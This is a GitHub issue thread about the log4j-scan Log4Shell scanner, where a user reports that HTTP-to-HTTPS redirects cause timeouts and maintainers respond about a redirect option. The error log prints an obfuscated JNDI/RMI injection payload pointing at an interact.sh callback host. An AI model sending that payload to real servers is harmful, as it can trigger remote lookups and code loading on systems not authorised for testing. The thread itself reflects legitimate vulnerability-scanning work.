http-to-https redirects are not handled well during scanning (exception, timeout)

Question

http-to-https redirects are not handled well during scanning (exception, timeout)

perskes opened this issue 3 years ago · comments

perskes_ commented 3 years ago

System:

Windows 10 - Python 3.10, Pycharms IDE and Terminal

Linux (WSL2) - Python 3.8

Problem:

http://my.awesome.site is redirected to https://my.awesome.site (set on the firewall).
This causes the following error/throwup/dump:

[•] URL: http://my.awesome.site | PAYLOAD: ${${lower:${lower:jndi}}:${lower:rmi}://my.awesome.site.5rv6412dr7774p2yq16snj4v3842g500s.interact.sh/ikhn0qc}
EXCEPTION: HTTPConnectionPool(host='my.awesome.site', port=80): Max retries exceeded with url: /?v=%24%7B%24%7Blower%3A%24%7Blower%3Ajndi%7D%7D%3A%24%7Blower%3Armi%7D%3A%2F%2Fmy.awesome.site.5rv6412dr7774p2yq16snj4v3842g500s.interact.sh%2Fikhn0qc%7D (Caused by ConnectTimeoutError(<urllib3.connection.HTTPConnection object at 0x7f1d0b353f10>, 'Connection to my.awesome.site timed out. (connect timeout=4)'))
EXCEPTION: HTTPConnectionPool(host='my.awesome.site', port=80): Max retries exceeded with url: /?v=%24%7B%24%7Blower%3A%24%7Blower%3Ajndi%7D%7D%3A%24%7Blower%3Armi%7D%3A%2F%2Fmy.awesome.site.5rv6412dr7774p2yq16snj4v3842g500s.interact.sh%2Fikhn0qc%7D (Caused by ConnectTimeoutError(<urllib3.connection.HTTPConnection object at 0x7f1d0ae45e20>, 'Connection to my.awesome.site timed out. (connect timeout=4)'))
EXCEPTION: HTTPConnectionPool(host='my.awesome.site', port=80): Max retries exceeded with url: /?v=%24%7B%24%7Blower%3A%24%7Blower%3Ajndi%7D%7D%3A%24%7Blower%3Armi%7D%3A%2F%2Fmy.awesome.site.5rv6412dr7774p2yq16snj4v3842g500s.interact.sh%2Fikhn0qc%7D (Caused by ConnectTimeoutError(<urllib3.connection.HTTPConnection object at 0x7f1d0b331ee0>, 'Connection to my.awesome.site timed out. (connect timeout=4)'))

The browser gets a 302 redirect, while the scanner does not follow the redirect and instead retries the same url two more times.
This is very time inefficient and causes my traces to take much longer than they should.

Besides that, the tool works amazingly well, and this is just something that bugs me.
It's fully functional even with that problem.

Mazin Ahmed · Answer 1 · Wed Dec 15 2021 20:07:10 GMT+0800 (China Standard Time)

Hi @perskes

Thank you very much for your suggestion! I just added this option now :)

0502467

--disable-http-redirects

This should disable web redirects when used.

Alix Lourme · Answer 2 · Thu Dec 16 2021 22:32:50 GMT+0800 (China Standard Time)

while the scanner does not follow the redirect

@perskes : Can you explain a little bit more your use case please ? Because I'm not sure to understand where come from the ConnectTimeoutError.

Because from real tests or below snippet, log4j-scan is following the http->http(s) redirects.

Snippet:

On your host, execute a https port sniffer (sample: sudo tcpflow -i any -C -J port 443)
On other windows, execute python3 log4j-scan.py -u http://github.com --custom-dns-callback-host "noexist" (http://github.com redirects to https://github.com)

You can see some activity on https port (=> redirection).